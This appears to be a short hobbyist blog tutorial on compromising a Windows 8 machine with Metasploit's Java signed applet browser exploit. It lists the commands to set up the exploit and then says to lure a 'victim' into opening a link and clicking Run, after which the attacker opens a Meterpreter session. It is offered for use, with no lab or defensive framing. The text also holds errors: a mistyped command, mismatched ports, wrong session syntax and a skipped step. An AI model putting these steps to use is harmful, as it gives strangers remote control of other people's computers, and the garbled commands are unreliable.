TUTORIAL : Hack Windows 8 Using Metasploit in 2 minutes.

So First You Need .

1. Backtrack R3 Operating System
2. Metasploit
3. Exploit

So lets' Start.....
1.Start Backtrack in Gui MOde.
2.Open Terminal
3.Type :msfconcole
4.Then Type
msf: use exploit/multi/browser/java_signed_applet
5.To Show soptions Type 
msf:show options
6.After This You want set LHOST Means Localhost .
First check you Ip from network connections if you are doing this live check your isp ip address.
TO set LHOST Type:
msf: set LHOST eg.192.168.1.27
7.Then you want to set LPORT.
TYPE:
msf: set LPORT 80
9.Then Set URIPATH
TYPE :
msf: set URIPATH /
Now Everything is Set.
Now Type:
msf : exploit 

After This GO to victim Machine Or give him your ip address 
like this: 192.168.1.27:8080
When He/she open your link he/she see this massage on screen
Cick On RUN and you can see in bt Session is opend
To See sessions 
type:
msf :session -i

To Open Meterpreter
type
msf: session -i 1 (1 is session id)

Enjoy ........
Stay tuned for new exploits or tutorials.



0 comments: